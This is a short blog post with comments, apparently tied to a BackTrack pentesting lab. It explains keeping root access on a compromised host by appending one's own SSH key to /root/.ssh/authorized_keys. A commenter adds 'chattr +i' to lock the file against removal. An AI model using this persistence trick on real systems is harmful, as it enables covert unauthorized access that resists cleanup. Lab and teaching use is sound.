In the penetrating with backtrack labs on viewing the/etc/passwd it’s sometimes full of other students usernames which is not very stealthy and is very noticeable, it also opens up additional vulnrablites if it were a real pentest.
It is far easier to add your own ssh key to the root/.ssh/authorized_keys
First create your ssh key with the command below and hit enter a few times:
$ ssh-keygen
This will create a few files in /root/.ssh/ including id_rsa.pub
Once created you need to copy the contents of your “id_rsa.pub” to end of the authorized_keys file on the compromised host.
This is usually in /root/.ssh/authorized_keys
Then you can just ssh -p 22 root@IP and you will be logged in as root.
Anonymous says:
dude a little explanation pls…
RE: added picture and little more detail
HildeGard says:
if you put the key inside do this
chattr +i /root/.ssh/authorized_keys
😉